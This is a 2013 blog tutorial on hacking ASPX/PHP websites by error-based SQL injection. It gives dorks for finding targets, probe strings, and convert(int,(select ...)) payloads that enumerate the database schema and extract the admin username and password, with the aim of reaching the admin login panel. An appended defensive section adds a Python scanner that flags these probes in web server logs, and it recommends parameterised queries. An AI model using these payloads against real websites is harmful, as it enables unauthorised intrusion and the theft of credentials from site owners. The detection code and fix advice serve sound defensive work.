Which Anti Virus


Saturday, 6 April 2013

Hacking Aspx / Php websites (ACTIVE SQL INJECTION)

Posted on 10:42 by Unknown




Hey guys, in this tutorial I will show you how to make an injection on an ASPX-based website.

1) Search for an ASPX website.
For this step you can use one of these dorks:

".aspx?bookID= "    OR        ".php?id= "

2) If you found one, let's check whether the website is vulnerable. Add this text after the URL:
"order by 1--"
example : http://www.target.com/index.aspx?Id=1 order by 1--
Now you will get an error: "Page not found" or something like that.

3) Let's go on and begin with the injection. The first step of every injection is to find out the columns.
For this step we use:
"having 1=1"
You only have to append it to the URL.
example : http://www.target.com/index.aspx?Id=1 having 1=1

4) Well, let's go on and search the tables. Use this code for it:
and 1=convert
example : http://www.target.com/index.aspx?Id=1 and 1=convert
The output is the first table of the database, but this table doesn't help you.
You need to find the admin table.
Use this query to get the next table:
"and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Tab_FinalOrder')))"

example : http://www.target.com/index.aspx?Id=1 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Tab_FinalOrder')))

Now we get the name of the admin table. In this example the admin table name is "Administration".

5) Now let's get into the table Administration.
Use this query for it:
"and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name = 'AdminMaster'))"

example : http://www.target.com/index.aspx?Id=1 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name = 'AdminMaster'))

6) Our results are the columns "AdminName" and "AdminPassword".
Now we have done most of this injection. The last step is to find out the admin name and admin password.

Query for Admin name : 
"and 1=convert(int,(select top 1 AdminName from Administration))" 
example : http://www.target.com/index.aspx?Id=1 and 1=convert(int,(select top 1 AdminName from Administration)) 

Query for Admin pass : 
"and 1=convert(int,(select top 1 AdminPassword from Administration))" 
example : http://www.target.com/index.aspx?Id=1 and 1=convert(int,(select top 1 AdminPassword from Administration)) 

7) So now you are nearly finished. You only need to find the admin login panel.
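
Seen from the defender's side, every probe in steps 2 to 6 leaves a recognisable trace in the web server's access log. The scan below is an added example, not part of the original post: it runs over constructed W3C-format log lines, and the field layout, sample requests and signature names are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Signatures for the probes the tutorial appends to a numeric parameter.
SIGNATURES = {
    "order-by-probe": re.compile(r"\border\s+by\s+\d+\s*--", re.I),
    "having-probe": re.compile(r"\bhaving\s+\d+\s*=\s*\d+", re.I),
    "convert-error-extraction": re.compile(r"\bconvert\s*\(\s*int\s*,\s*\(\s*select\b", re.I),
    "schema-enumeration": re.compile(r"\binformation_schema\s*\.\s*(tables|columns)\b", re.I),
}

# Constructed sample log (W3C extended format); IPs are documentation ranges.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2013-04-06 10:42:09 203.0.113.7 GET /index.aspx Id=1+order+by+1-- 500
2013-04-06 10:42:15 203.0.113.7 GET /index.aspx Id=1+having+1=1 500
2013-04-06 10:42:30 203.0.113.7 GET /index.aspx Id=1+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables)) 500
2013-04-06 10:43:02 198.51.100.20 GET /index.aspx Id=1%2520order%2520by%25201-- 500
2013-04-06 10:43:10 198.51.100.20 GET /search.aspx q=how+to+order+by+phone 200
""".splitlines()

def decode(value, rounds=2):
    """Undo nested URL-encoding so double-encoded probes are still seen."""
    for _ in range(rounds):
        value = unquote_plus(value)
    return value

def classify(value):
    """Return the sorted names of every signature found in one parameter value."""
    text = decode(value)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))

def scan(lines):
    """Return one finding per query parameter that matches a signature."""
    fields, findings = [], []
    for line in lines:
        if line.startswith("#") or not line.strip():
            if line.startswith("#Fields:"):
                fields = line.split()[1:]  # column order is declared by the log itself
            continue
        rec = dict(zip(fields, line.split()))
        for param, value in parse_qsl(rec.get("cs-uri-query", ""), keep_blank_values=True):
            hits = classify(value)
            if hits:
                findings.append({"ip": rec.get("c-ip"), "param": param,
                                 "status": rec.get("sc-status"), "hits": hits})
    return findings

if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

Matches are a triage signal only. The fix is to bind `Id` as a typed parameter in the query and return a generic error page, so appended SQL is never parsed and conversion errors never reach the client.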